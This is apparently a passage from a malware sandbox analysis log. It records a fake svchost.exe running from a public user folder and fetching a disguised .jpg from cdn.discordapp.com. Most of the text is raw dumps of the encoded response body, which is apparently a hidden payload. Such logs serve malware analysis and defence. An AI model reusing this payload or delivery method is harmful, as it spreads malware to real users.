                    2021-10-26 16:59:45 UTC4455INData Raw: 39 20 32 32 34 20 31 36 32 20 31 37 32 20 32 32 34 20 31 36 33 20 31 35 32 20 32 32 34 20 31 36 32 20 31 37 31 20 32 32 34 20 31 36 32 20 31 39 30 20 32 32 34 20 31 36 33 20 31 34 30 20 32 32 34 20 31 36 32 20 31 39 30 20 32 32 34 20 31 36 33 20 31 32 39 20 32 32 34 20 31 36 33 20 31 34 31 20 32 32 34 20 31 36 33 20 31 35 38 20 32 32 34 20 31 36 32 20 31 36 35 20 30 20 32 32 34 20 31 36 32 20 31 35 32 20 32 32 34 20 31 36 32 20 31 33 37 20 32 32 34 20 31 36 32 20 31 38 30 20 32 32 34 20 31 36 32 20 31 34 37 20 32 32 34 20 31 36 32 20 31 36 36 20 32 32 34 20 31 36 32 20 31 34 30 20 32 32 34 20 31 36 31 20 31 38 36 20 32 32 34 20 31 36 31 20 31 38 37 20 32 32 34 20 31 36 32 20 31 36 38 20 32 32 34 20 31 36 32 20 31 36 35 20 32 32 34 20 31 36 32 20 31 36 34
                    Data Ascii: 9 224 162 172 224 163 152 224 162 171 224 162 190 224 163 140 224 162 190 224 163 129 224 163 141 224 163 158 224 162 165 0 224 162 152 224 162 137 224 162 180 224 162 147 224 162 166 224 162 140 224 161 186 224 161 187 224 162 168 224 162 165 224 162 164
                    2021-10-26 16:59:45 UTC4471INData Raw: 32 32 35 20 31 34 36 20 31 34 36 20 32 32 35 20 31 34 35 20 31 38 30 20 32 32 35 20 31 34 35 20 31 37 35 20 32 32 35 20 31 34 35 20 31 37 37 20 32 32 35 20 31 34 35 20 31 38 30 20 32 32 35 20 31 34 35 20 31 37 33 20 32 32 35 20 31 34 36 20 31 36 30 20 32 32 35 20 31 34 36 20 31 36 31 20 32 32 35 20 31 34 36 20 31 36 32 20 32 32 35 20 31 34 35 20 31 37 33 20 30 20 32 32 36 20 31 34 35 20 31 38 31 20 32 32 36 20 31 34 35 20 31 37 37 20 32 32 36 20 31 34 35 20 31 38 35 20 32 32 36 20 31 34 36 20 31 36 33 20 32 32 36 20 31 34 36 20 31 36 34 20 32 32 36 20 31 34 35 20 31 38 36 20 32 32 36 20 31 34 35 20 31 38 31 20 32 32 36 20 31 34 35 20 31 38 30 20 32 32 36 20 31 34 36 20 31 37 38 20 32 32 36 20 31 34 36 20 31 38 31 20 32 32 36 20 31 34 35 20 31 38 35 20 32
                    Data Ascii: 225 146 146 225 145 180 225 145 175 225 145 177 225 145 180 225 145 173 225 146 160 225 146 161 225 146 162 225 145 173 0 226 145 181 226 145 177 226 145 185 226 146 163 226 146 164 226 145 186 226 145 181 226 145 180 226 146 178 226 146 181 226 145 185 2


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    5192.168.2.349698162.159.134.233443C:\Users\Public\Documents\???????????????\svchost.exe
                    TimestampkBytes transferredDirectionData
                    2021-10-26 16:59:46 UTC4479OUTGET /attachments/893177342426509335/897185987367678032/09E84BB7.jpg HTTP/1.1
                    Host: cdn.discordapp.com
                    2021-10-26 16:59:46 UTC4479INHTTP/1.1 200 OK
                    Date: Tue, 26 Oct 2021 16:59:46 GMT
                    Content-Type: image/jpeg
                    Content-Length: 754681
                    Connection: close
                    CF-Ray: 6a453cacdb224321-FRA
                    Accept-Ranges: bytes
                    Age: 1057
                    Cache-Control: public, max-age=31536000
                    ETag: "67627ddafc6ba2588faf0c788dec6e85"
                    Expires: Wed, 26 Oct 2022 16:59:46 GMT
                    Last-Modified: Mon, 11 Oct 2021 18:16:48 GMT
                    Vary: Accept-Encoding
                    CF-Cache-Status: HIT
                    Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                    Cf-Bgj: h2pri
                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                    x-goog-generation: 1633976208346288
                    x-goog-hash: crc32c=75c5bQ==
                    x-goog-hash: md5=Z2J92vxroliPrwx4jexuhQ==
                    x-goog-metageneration: 1
                    x-goog-storage-class: STANDARD
                    x-goog-stored-content-encoding: identity
                    x-goog-stored-content-length: 754681
                    X-GUploader-UploadID: ADPycdvoLYZ1NnA4WezzLEAzmJeNwJypM6fQ7yCecEsDt16F8bBFv5AcwUjNmUn-Eji2KLbxk0rJIeeBQxG8hUHphfQ
                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AjWen1VVu7fE2bAAD5GReCjmeaK2hPPeShIh1k%2BdQhdXPIK4kvC0IQktqu3XbJk%2BfxLLKZ4pxj1yDjwmqZMSr%2BZssuSYf5BBDhLf%2BRUuZeSByCVA4I89cmeAeYHiP49z6oRkgA%3D%3D"}],"group":"cf-nel","max_age":604800}
                    2021-10-26 16:59:46 UTC4481INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                    Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                    2021-10-26 16:59:46 UTC4481INData Raw: 20 31 33 35 20 31 34 32 20 32 32 38 20 31 33 34 20 31 37 33 20 32 32 38 20 31 33 34 20 31 37 32 20 32 32 38 20 31 33 35 20 31 33 32 20 32 32 38 20 31 33 35 20 31 38 30 20 32 32 38 20 31 33 35 20 31 33 30 20 32 32 38 20 31 33 35 20 31 36 37 20 32 32 38 20 31 33 34 20 31 37 37 20 32 32 38 20 31 33 35 20 31 37 31 20 32 32 38 20 31 33 35 20 31 35 38 20 32 32 38 20 31 33 34 20 31 37 34 20 32 32 38 20 31 33 34 20 31 37 38 20 30 20 32 32 38 20 31 34 31 20 31 33 33 20 32 32 38 20 31 34 31 20 31 38 32 20 32 32 38 20 31 34 31 20 31 33 37 20 32 32 38 20 31 34 32 20 31 33 33 20 32 32 38 20 31 34 31 20 31 38 35 20 32 32 38 20 31 34 31 20 31 36 33 20 32 32 38 20 31 34 31 20 31 33 32 20 32 32 38 20 31 34 31 20 31 34 37 20 32 32 38 20 31 34 31 20 31 38 30 20 32 32 38 20
                    Data Ascii: 135 142 228 134 173 228 134 172 228 135 132 228 135 180 228 135 130 228 135 167 228 134 177 228 135 171 228 135 158 228 134 174 228 134 178 0 228 141 133 228 141 182 228 141 137 228 142 133 228 141 185 228 141 163 228 141 132 228 141 147 228 141 180 228
                    2021-10-26 16:59:46 UTC4482INData Raw: 33 20 32 33 36 20 31 36 31 20 31 33 37 20 32 33 36 20 31 36 31 20 31 33 36 20 32 33 36 20 31 36 30 20 31 35 39 20 32 33 36 20 31 36 30 20 31 38 34 20 32 33 36 20 31 36 31 20 31 35 38 20 32 33 36 20 31 36 31 20 31 35 37 20 32 33 36 20 31 36 30 20 31 37 38 20 30 20 32 33 38 20 31 36 37 20 31 37 37 20 32 33 38 20 31 36 38 20 31 35 37 20 32 33 38 20 31 36 38 20 31 37 38 20 32 33 38 20 31 36 37 20 31 37 39 20 32 33 38 20 31 36 38 20 31 34 30 20 32 33 38 20 31 36 38 20 31 36 36 20 32 33 38 20 31 36 37 20 31 37 39 20 32 33 38 20 31 36 37 20 31 37 34 20 32 33 38 20 31 36 37 20 31 38 30 20 32 33 38 20 31 36 38 20 31 35 38 20 32 33 38 20 31 36 38 20 31 38 30 20 32 33 38 20 31 36 37 20 31 37 34 20 32 33 38 20 31 36 37 20 31 37 32 20 32 33 38 20 31 36 38 20 31 37 38
                    Data Ascii: 3 236 161 137 236 161 136 236 160 159 236 160 184 236 161 158 236 161 157 236 160 178 0 238 167 177 238 168 157 238 168 178 238 167 179 238 168 140 238 168 166 238 167 179 238 167 174 238 167 180 238 168 158 238 168 180 238 167 174 238 167 172 238 168 178
                    2021-10-26 16:59:46 UTC4483INData Raw: 20 31 35 36 20 32 32 34 20 31 36 35 20 31 36 37 20 32 32 34 20 31 36 35 20 31 32 38 20 32 32 34 20 31 36 35 20 31 38 39 20 32 32 34 20 31 36 35 20 31 32 39 20 32 32 34 20 31 36 35 20 31 32 38 20 32 32 34 20 31 36 35 20 31 37 39 20 32 32 34 20 31 36 35 20 31 34 35 20 32 32 34 20 31 36 35 20 31 36 33 20 32 32 34 20 31 36 35 20 31 37 37 20 32 32 34 20 31 36 35 20 31 35 35 20 32 32 34 20 31 36 35 20 31 33 31 20 32 32 34 20 31 36 35 20 31 38 30 20 32 32 34 20 31 36 35 20 31 33 33 20 32 32 34 20 31 36 35 20 31 37 39 20 30 20 32 33 38 20 31 38 37 20 31 36 33 20 32 33 38 20 31 38 36 20 31 37 35 20 32 33 38 20 31 38 37 20 31 36 32 20 32 33 38 20 31 38 37 20 31 36 31 20 32 33 38 20 31 38 36 20 31 38 32 20 32 33 38 20 31 38 36 20 31 37 37 20 32 33 38 20 31 38 36 20
                    Data Ascii: 156 224 165 167 224 165 128 224 165 189 224 165 129 224 165 128 224 165 179 224 165 145 224 165 163 224 165 177 224 165 155 224 165 131 224 165 180 224 165 133 224 165 179 0 238 187 163 238 186 175 238 187 162 238 187 161 238 186 182 238 186 177 238 186
                    2021-10-26 16:59:46 UTC4485INData Raw: 34 20 31 37 31 20 32 33 39 20 31 37 34 20 31 33 33 20 32 33 39 20 31 37 33 20 31 38 30 20 32 33 39 20 31 37 34 20 31 37 35 20 32 33 39 20 31 37 33 20 31 38 35 20 32 33 39 20 31 37 34 20 31 38 34 20 32 33 39 20 31 37 33 20 31 38 30 20 30 20 32 33 34 20 31 38 35 20 31 37 39 20 32 33 34 20 31 38 35 20 31 38 30 20 32 33 34 20 31 38 35 20 31 37 39 20 32 33 34 20 31 38 35 20 31 33 33 20 32 33 34 20 31 38 35 20 31 36 34 20 32 33 34 20 31 38 35 20 31 35 31 20 32 33 34 20 31 38 35 20 31 35 30 20 32 33 34 20 31 38 35 20 31 36 38 20 32 33 34 20 31 38 35 20 31 33 33 20 32 33 34 20 31 38 35 20 31 38 32 20 32 33 34 20 31 38 35 20 31 32 38 20 32 33 34 20 31 38 35 20 31 33 36 20 32 33 34 20 31 38 35 20 31 32 38 20 32 33 34 20 31 38 36 20 31 33 37 20 32 33 34 20 31 38 35
                    Data Ascii: 4 171 239 174 133 239 173 180 239 174 175 239 173 185 239 174 184 239 173 180 0 234 185 179 234 185 180 234 185 179 234 185 133 234 185 164 234 185 151 234 185 150 234 185 168 234 185 133 234 185 182 234 185 128 234 185 136 234 185 128 234 186 137 234 185
                    2021-10-26 16:59:46 UTC4486INData Raw: 20 31 35 31 20 31 36 30 20 32 33 32 20 31 35 30 20 31 38 31 20 32 33 32 20 31 35 30 20 31 37 38 20 32 33 32 20 31 35 31 20 31 32 38 20 32 33 32 20 31 35 30 20 31 37 39 20 32 33 32 20 31 35 30 20 31 38 30 20 32 33 32 20 31 35 30 20 31 37 35 20 32 33 32 20 31 35 30 20 31 37 37 20 32 33 32 20 31 35 31 20 31 38 31 20 30 20 32 33 33 20 31 35 33 20 31 33 30 20 32 33 33 20 31 35 32 20 31 38 35 20 32 33 33 20 31 35 32 20 31 35 34 20 32 33 33 20 31 35 32 20 31 35 38 20 32 33 33 20 31 35 32 20 31 35 34 20 32 33 33 20 31 35 32 20 31 33 39 20 32 33 33 20 31 35 32 20 31 38 33 20 32 33 33 20 31 35 32 20 31 33 36 20 32 33 33 20 31 35 32 20 31 38 33 20 32 33 33 20 31 35 32 20 31 38 33 20 32 33 33 20 31 35 32 20 31 33 33 20 32 33 33 20 31 35 32 20 31 33 38 20 32 33 33 20
                    Data Ascii: 151 160 232 150 181 232 150 178 232 151 128 232 150 179 232 150 180 232 150 175 232 150 177 232 151 181 0 233 153 130 233 152 185 233 152 154 233 152 158 233 152 154 233 152 139 233 152 183 233 152 136 233 152 183 233 152 183 233 152 133 233 152 138 233
                    2021-10-26 16:59:46 UTC4487INData Raw: 33 20 31 37 33 20 31 38 31 20 30 20 32 33 33 20 31 37 37 20 31 33 30 20 32 33 33 20 31 37 37 20 31 34 36 20 32 33 33 20 31 37 37 20 31 33 33 20 32 33 33 20 31 37 37 20 31 38 31 20 32 33 33 20 31 37 37 20 31 33 37 20 32 33 33 20 31 37 37 20 31 33 34 20 32 33 33 20 31 37 37 20 31 35 37 20 32 33 33 20 31 37 37 20 31 36 36 20 32 33 33 20 31 37 37 20 31 33 30 20 32 33 33 20 31 37 37 20 31 37 39 20 32 33 33 20 31 37 38 20 31 32 39 20 32 33 33 20 31 37 37 20 31 33 33 20 32 33 33 20 31 37 37 20 31 33 37 20 32 33 33 20 31 37 37 20 31 33 33 20 32 33 33 20 31 37 37 20 31 38 31 20 30 20 32 33 33 20 31 38 32 20 31 33 39 20 32 33 33 20 31 38 32 20 31 38 35 20 32 33 33 20 31 38 32 20 31 33 39 20 32 33 33 20 31 38 32 20 31 36 33 20 32 33 33 20 31 38 32 20 31 38 35 20 32
                    Data Ascii: 3 173 181 0 233 177 130 233 177 146 233 177 133 233 177 181 233 177 137 233 177 134 233 177 157 233 177 166 233 177 130 233 177 179 233 178 129 233 177 133 233 177 137 233 177 133 233 177 181 0 233 182 139 233 182 185 233 182 139 233 182 163 233 182 185 2
                    2021-10-26 16:59:46 UTC4489INData Raw: 20 32 32 36 20 31 33 37 20 31 33 36 20 32 32 36 20 31 33 37 20 31 38 32 20 32 32 36 20 31 33 37 20 31 33 34 20 32 32 36 20 31 33 37 20 31 33 31 20 32 32 36 20 31 33 37 20 31 33 32 20 32 32 36 20 31 33 37 20 31 33 31 20 32 32 36 20 31 33 37 20 31 33 36 20 32 32 36 20 31 33 37 20 31 38 32 20 30 20 32 33 30 20 31 34 31 20 31 36 34 20 32 33 30 20 31 34 30 20 31 38 32 20 32 33 30 20 31 34 30 20 31 38 32 20 32 33 30 20 31 34 30 20 31 37 38 20 32 33 30 20 31 34 31 20 31 34 37 20 32 33 30 20 31 34 31 20 31 35 30 20 32 33 30 20 31 34 30 20 31 37 38 20 32 33 30 20 31 34 30 20 31 37 37 20 32 33 30 20 31 34 30 20 31 37 35 20 32 33 30 20 31 34 30 20 31 37 38 20 32 33 30 20 31 34 31 20 31 33 30 20 32 33 30 20 31 34 30 20 31 37 37 20 32 33 30 20 31 34 31 20 31 36 36 20
                    Data Ascii: 226 137 136 226 137 182 226 137 134 226 137 131 226 137 132 226 137 131 226 137 136 226 137 182 0 230 141 164 230 140 182 230 140 182 230 140 178 230 141 147 230 141 150 230 140 178 230 140 177 230 140 175 230 140 178 230 141 130 230 140 177 230 141 166
                    2021-10-26 16:59:46 UTC4490INData Raw: 32 20 30 20 32 32 38 20 31 37 34 20 31 36 31 20 32 32 38 20 31 37 34 20 31 33 34 20 32 32 38 20 31 37 34 20 31 33 36 20 32 32 38 20 31 37 34 20 31 37 35 20 32 32 38 20 31 37 33 20 31 37 35 20 32 32 38 20 31 37 33 20 31 37 37 20 32 32 38 20 31 37 34 20 31 34 34 20 32 32 38 20 31 37 33 20 31 38 32 20 32 32 38 20 31 37 33 20 31 38 33 20 32 32 38 20 31 37 33 20 31 38 32 20 32 32 38 20 31 37 33 20 31 37 37 20 32 32 38 20 31 37 34 20 31 36 34 20 32 32 38 20 31 37 34 20 31 37 36 20 32 32 38 20 31 37 33 20 31 38 30 20 32 32 38 20 31 37 33 20 31 38 32 20 30 20 32 33 33 20 31 37 34 20 31 36 34 20 32 33 33 20 31 37 33 20 31 37 39 20 32 33 33 20 31 37 33 20 31 38 32 20 32 33 33 20 31 37 33 20 31 38 32 20 32 33 33 20 31 37 34 20 31 33 34 20 32 33 33 20 31 37 34 20 31
                    Data Ascii: 2 0 228 174 161 228 174 134 228 174 136 228 174 175 228 173 175 228 173 177 228 174 144 228 173 182 228 173 183 228 173 182 228 173 177 228 174 164 228 174 176 228 173 180 228 173 182 0 233 174 164 233 173 179 233 173 182 233 173 182 233 174 134 233 174 1
                    2021-10-26 16:59:46 UTC4491INData Raw: 20 31 38 31 20 32 33 39 20 31 38 37 20 31 38 33 20 32 33 39 20 31 38 38 20 31 39 31 20 32 33 39 20 31 38 38 20 31 37 31 20 32 33 39 20 31 38 37 20 31 39 31 20 32 33 39 20 31 38 37 20 31 38 35 20 32 33 39 20 31 38 38 20 31 39 30 20 32 33 39 20 31 38 37 20 31 38 32 20 30 20 32 32 39 20 31 32 39 20 31 34 32 20 32 32 39 20 31 32 39 20 31 35 32 20 32 32 39 20 31 32 39 20 31 33 39 20 32 32 39 20 31 32 39 20 31 36 31 20 32 32 39 20 31 33 30 20 31 34 30 20 32 32 39 20 31 32 39 20 31 33 37 20 32 32 39 20 31 32 39 20 31 33 38 20 32 32 39 20 31 32 39 20 31 38 37 20 32 32 39 20 31 32 39 20 31 38 35 20 32 32 39 20 31 32 39 20 31 34 31 20 32 32 39 20 31 32 39 20 31 33 33 20 32 32 39 20 31 32 39 20 31 37 32 20 32 32 39 20 31 32 39 20 31 38 32 20 32 32 39 20 31 32 39 20
                    Data Ascii: 181 239 187 183 239 188 191 239 188 171 239 187 191 239 187 185 239 188 190 239 187 182 0 229 129 142 229 129 152 229 129 139 229 129 161 229 130 140 229 129 137 229 129 138 229 129 187 229 129 185 229 129 141 229 129 133 229 129 172 229 129 182 229 129
                    2021-10-26 16:59:46 UTC4493INData Raw: 31 37 30 20 31 33 34 20 32 32 34 20 31 37 30 20 31 36 36 20 32 32 34 20 31 36 39 20 31 38 30 20 32 32 34 20 31 36 39 20 31 38 31 20 32 32 34 20 31 36 39 20 31 38 32 20 32 32 34 20 31 37 30 20 31 36 39 20 32 32 34 20 31 37 30 20 31 37 38 20 32 32 34 20 31 36 39 20 31 38 33 20 32 32 34 20 31 37 30 20 31 36 35 20 32 32 34 20 31 37 30 20 31 35 34 20 32 32 34 20 31 37 30 20 31 35 32 20 32 32 34 20 31 36 39 20 31 38 33 20 32 32 34 20 31 36 39 20 31 38 30 20 32 32 34 20 31 36 39 20 31 38 31 20 32 32 34 20 31 36 39 20 31 38 33 20 30 20 32 33 36 20 31 36 39 20 31 35 31 20 32 33 36 20 31 36 39 20 31 36 37 20 32 33 36 20 31 37 30 20 31 33 31 20 32 33 36 20 31 36 39 20 31 34 34 20 32 33 36 20 31 37 30 20 31 32 39 20 32 33 36 20 31 36 39 20 31 37 32 20 32 33 36 20 31
                    Data Ascii: 170 134 224 170 166 224 169 180 224 169 181 224 169 182 224 170 169 224 170 178 224 169 183 224 170 165 224 170 154 224 170 152 224 169 183 224 169 180 224 169 181 224 169 183 0 236 169 151 236 169 167 236 170 131 236 169 144 236 170 129 236 169 172 236 1
                    2021-10-26 16:59:46 UTC4494INData Raw: 20 31 34 33 20 31 33 31 20 32 33 31 20 31 34 33 20 31 38 34 20 30 20 32 33 32 20 31 34 35 20 31 33 31 20 32 33 32 20 31 34 34 20 31 33 36 20 32 33 32 20 31 34 34 20 31 38 34 20 32 33 32 20 31 34 34 20 31 38 36 20 32 33 32 20 31 34 34 20 31 37 33 20 32 33 32 20 31 34 34 20 31 33 38 20 32 33 32 20 31 34 34 20 31 38 36 20 32 33 32 20 31 34 34 20 31 34 31 20 32 33 32 20 31 34 35 20 31 33 33 20 32 33 32 20 31 34 34 20 31 38 35 20 32 33 32 20 31 34 34 20 31 33 36 20 32 33 32 20 31 34 34 20 31 38 33 20 32 33 32 20 31 34 34 20 31 33 34 20 32 33 32 20 31 34 34 20 31 38 33 20 32 33 32 20 31 34 34 20 31 38 34 20 30 20 32 32 36 20 31 35 30 20 31 39 31 20 32 32 36 20 31 35 30 20 31 39 31 20 32 32 36 20 31 35 30 20 31 38 37 20 32 32 36 20 31 35 31 20 31 38 32 20 32 32
                    Data Ascii: 143 131 231 143 184 0 232 145 131 232 144 136 232 144 184 232 144 186 232 144 173 232 144 138 232 144 186 232 144 141 232 145 133 232 144 185 232 144 136 232 144 183 232 144 134 232 144 183 232 144 184 0 226 150 191 226 150 191 226 150 187 226 151 182 22
                    2021-10-26 16:59:46 UTC4495INData Raw: 32 32 34 20 31 37 35 20 31 34 36 20 32 32 34 20 31 37 35 20 31 37 38 20 32 32 34 20 31 37 35 20 31 37 38 20 32 32 34 20 31 37 36 20 31 33 34 20 32 32 34 20 31 37 36 20 31 33 38 20 32 32 34 20 31 37 35 20 31 33 32 20 32 32 34 20 31 37 35 20 31 38 33 20 32 32 34 20 31 37 36 20 31 33 32 20 32 32 34 20 31 37 35 20 31 38 34 20 30 20 32 33 36 20 31 37 38 20 31 38 33 20 32 33 36 20 31 37 37 20 31 38 30 20 32 33 36 20 31 37 38 20 31 36 39 20 32 33 36 20 31 37 38 20 31 34 35 20 32 33 36 20 31 37 38 20 31 34 38 20 32 33 36 20 31 37 38 20 31 36 36 20 32 33 36 20 31 37 37 20 31 38 35 20 32 33 36 20 31 37 37 20 31 38 38 20 32 33 36 20 31 37 38 20 31 37 32 20 32 33 36 20 31 37 37 20 31 38 36 20 32 33 36 20 31 37 37 20 31 38 34 20 32 33 36 20 31 37 37 20 31 38 32 20 32
                    Data Ascii: 224 175 146 224 175 178 224 175 178 224 176 134 224 176 138 224 175 132 224 175 183 224 176 132 224 175 184 0 236 178 183 236 177 180 236 178 169 236 178 145 236 178 148 236 178 166 236 177 185 236 177 188 236 178 172 236 177 186 236 177 184 236 177 182 2
                    2021-10-26 16:59:46 UTC4497INData Raw: 20 32 33 36 20 31 35 31 20 31 38 35 20 30 20 32 33 32 20 31 35 35 20 31 35 34 20 32 33 32 20 31 35 35 20 31 37 31 20 32 33 32 20 31 35 34 20 31 38 33 20 32 33 32 20 31 35 35 20 31 39 31 20 32 33 32 20 31 35 35 20 31 37 36 20 32 33 32 20 31 35 35 20 31 37 33 20 32 33 32 20 31 35 35 20 31 36 31 20 32 33 32 20 31 35 34 20 31 38 38 20 32 33 32 20 31 35 35 20 31 34 32 20 32 33 32 20 31 35 34 20 31 39 30 20 32 33 32 20 31 35 35 20 31 36 38 20 32 33 32 20 31 35 35 20 31 36 38 20 32 33 32 20 31 35 35 20 31 34 32 20 32 33 32 20 31 35 35 20 31 36 39 20 32 33 32 20 31 35 34 20 31 38 35 20 30 20 32 32 34 20 31 36 39 20 31 33 36 20 32 32 34 20 31 36 39 20 31 33 31 20 32 32 34 20 31 36 39 20 31 33 33 20 32 32 34 20 31 36 39 20 31 38 31 20 32 32 34 20 31 36 39 20 31 33
                    Data Ascii: 236 151 185 0 232 155 154 232 155 171 232 154 183 232 155 191 232 155 176 232 155 173 232 155 161 232 154 188 232 155 142 232 154 190 232 155 168 232 155 168 232 155 142 232 155 169 232 154 185 0 224 169 136 224 169 131 224 169 133 224 169 181 224 169 13
                    2021-10-26 16:59:46 UTC4498INData Raw: 31 33 37 20 32 33 33 20 31 38 38 20 31 35 39 20 32 33 33 20 31 38 38 20 31 38 38 20 32 33 33 20 31 38 38 20 31 35 36 20 32 33 33 20 31 38 38 20 31 34 34 20 32 33 33 20 31 38 38 20 31 37 31 20 32 33 33 20 31 38 38 20 31 33 36 20 32 33 33 20 31 38 39 20 31 32 39 20 32 33 33 20 31 38 38 20 31 38 35 20 30 20 32 32 35 20 31 32 39 20 31 33 33 20 32 32 35 20 31 32 39 20 31 33 39 20 32 32 35 20 31 32 39 20 31 37 33 20 32 32 35 20 31 32 39 20 31 36 34 20 32 32 35 20 31 32 39 20 31 33 35 20 32 32 35 20 31 32 39 20 31 38 33 20 32 32 35 20 31 32 39 20 31 36 33 20 32 32 35 20 31 32 39 20 31 38 31 20 32 32 35 20 31 32 39 20 31 39 31 20 32 32 35 20 31 32 39 20 31 38 36 20 32 32 35 20 31 32 39 20 31 33 32 20 32 32 35 20 31 32 39 20 31 33 37 20 32 32 35 20 31 32 39 20 31
                    Data Ascii: 137 233 188 159 233 188 188 233 188 156 233 188 144 233 188 171 233 188 136 233 189 129 233 188 185 0 225 129 133 225 129 139 225 129 173 225 129 164 225 129 135 225 129 183 225 129 163 225 129 181 225 129 191 225 129 186 225 129 132 225 129 137 225 129 1
                    2021-10-26 16:59:46 UTC4499INData Raw: 20 31 38 36 20 30 20 32 33 32 20 31 35 33 20 31 36 39 20 32 33 32 20 31 35 33 20 31 37 30 20 32 33 32 20 31 35 32 20 31 38 36 20 32 33 32 20 31 35 33 20 31 36 37 20 32 33 32 20 31 35 33 20 31 34 38 20 32 33 32 20 31 35 32 20 31 39 30 20 32 33 32 20 31 35 33 20 31 35 33 20 32 33 32 20 31 35 32 20 31 38 36 20 32 33 32 20 31 35 33 20 31 37 39 20 32 33 32 20 31 35 32 20 31 38 35 20 32 33 32 20 31 35 33 20 31 36 37 20 32 33 32 20 31 35 33 20 31 37 31 20 32 33 32 20 31 35 32 20 31 38 35 20 32 33 32 20 31 35 33 20 31 38 37 20 32 33 32 20 31 35 32 20 31 38 36 20 30 20 32 33 39 20 31 35 35 20 31 37 30 20 32 33 39 20 31 35 36 20 31 32 39 20 32 33 39 20 31 35 35 20 31 36 32 20 32 33 39 20 31 35 35 20 31 37 34 20 32 33 39 20 31 35 34 20 31 38 39 20 32 33 39 20 31 35
                    Data Ascii: 186 0 232 153 169 232 153 170 232 152 186 232 153 167 232 153 148 232 152 190 232 153 153 232 152 186 232 153 179 232 152 185 232 153 167 232 153 171 232 152 185 232 153 187 232 152 186 0 239 155 170 239 156 129 239 155 162 239 155 174 239 154 189 239 15
                    2021-10-26 16:59:46 UTC4501INData Raw: 31 32 39 20 31 37 30 20 32 32 39 20 31 32 38 20 31 38 32 20 32 32 39 20 31 32 38 20 31 38 38 20 32 32 39 20 31 32 39 20 31 34 34 20 32 32 39 20 31 32 39 20 31 35 35 20 32 32 39 20 31 32 39 20 31 37 38 20 32 32 39 20 31 32 39 20 31 36 37 20 32 32 39 20 31 32 38 20 31 38 37 20 30 20 32 33 39 20 31 33 32 20 31 39 30 20 32 33 39 20 31 33 32 20 31 36 35 20 32 33 39 20 31 33 32 20 31 34 31 20 32 33 39 20 31 33 32 20 31 38 38 20 32 33 39 20 31 33 32 20 31 38 38 20 32 33 39 20 31 33 32 20 31 34 36 20 32 33 39 20 31 33 33 20 31 32 38 20 32 33 39 20 31 33 32 20 31 38 39 20 32 33 39 20 31 33 32 20 31 34 36 20 32 33 39 20 31 33 33 20 31 34 32 20 32 33 39 20 31 33 32 20 31 39 30 20 32 33 39 20 31 33 32 20 31 39 30 20 32 33 39 20 31 33 32 20 31 34 32 20 32 33 39 20 31
                    Data Ascii: 129 170 229 128 182 229 128 188 229 129 144 229 129 155 229 129 178 229 129 167 229 128 187 0 239 132 190 239 132 165 239 132 141 239 132 188 239 132 188 239 132 146 239 133 128 239 132 189 239 132 146 239 133 142 239 132 190 239 132 190 239 132 142 239 1
                    2021-10-26 16:59:46 UTC4502INData Raw: 33 30 20 31 35 31 20 31 37 36 20 32 33 30 20 31 35 31 20 31 34 32 20 32 33 30 20 31 35 31 20 31 34 30 20 32 33 30 20 31 35 31 20 31 34 33 20 32 33 30 20 31 35 31 20 31 35 33 20 32 33 30 20 31 35 31 20 31 38 39 20 32 33 30 20 31 35 31 20 31 34 32 20 32 33 30 20 31 35 31 20 31 38 36 20 32 33 30 20 31 35 31 20 31 38 39 20 32 33 30 20 31 35 31 20 31 36 33 20 32 33 30 20 31 35 31 20 31 37 34 20 32 33 30 20 31 35 31 20 31 34 30 20 32 33 30 20 31 35 31 20 31 34 30 20 32 33 30 20 31 35 31 20 31 33 39 20 32 33 30 20 31 35 31 20 31 38 37 20 30 20 32 33 36 20 31 35 33 20 31 36 35 20 32 33 36 20 31 35 32 20 31 37 37 20 32 33 36 20 31 35 33 20 31 37 32 20 32 33 36 20 31 35 33 20 31 33 37 20 32 33 36 20 31 35 32 20 31 37 38 20 32 33 36 20 31 35 33 20 31 34 32 20 32 33
                    Data Ascii: 30 151 176 230 151 142 230 151 140 230 151 143 230 151 153 230 151 189 230 151 142 230 151 186 230 151 189 230 151 163 230 151 174 230 151 140 230 151 140 230 151 139 230 151 187 0 236 153 165 236 152 177 236 153 172 236 153 137 236 152 178 236 153 142 23
                    2021-10-26 16:59:46 UTC4503INData Raw: 32 33 31 20 31 33 39 20 31 38 34 20 32 33 31 20 31 33 39 20 31 39 30 20 32 33 31 20 31 34 30 20 31 32 38 20 32 33 31 20 31 33 39 20 31 39 30 20 32 33 31 20 31 33 39 20 31 38 33 20 32 33 31 20 31 34 30 20 31 36 30 20 32 33 31 20 31 34 30 20 31 38 38 20 30 20 32 32 37 20 31 34 32 20 31 36 38 20 32 32 37 20 31 34 31 20 31 38 34 20 32 32 37 20 31 34 32 20 31 37 35 20 32 32 37 20 31 34 31 20 31 38 30 20 32 32 37 20 31 34 32 20 31 36 36 20 32 32 37 20 31 34 31 20 31 38 30 20 32 32 37 20 31 34 32 20 31 34 39 20 32 32 37 20 31 34 31 20 31 38 36 20 32 32 37 20 31 34 32 20 31 35 30 20 32 32 37 20 31 34 31 20 31 38 38 20 32 32 37 20 31 34 31 20 31 38 37 20 32 32 37 20 31 34 31 20 31 38 33 20 32 32 37 20 31 34 32 20 31 33 35 20 32 32 37 20 31 34 31 20 31 38 38 20 32
                    Data Ascii: 231 139 184 231 139 190 231 140 128 231 139 190 231 139 183 231 140 160 231 140 188 0 227 142 168 227 141 184 227 142 175 227 141 180 227 142 166 227 141 180 227 142 149 227 141 186 227 142 150 227 141 188 227 141 187 227 141 183 227 142 135 227 141 188 2
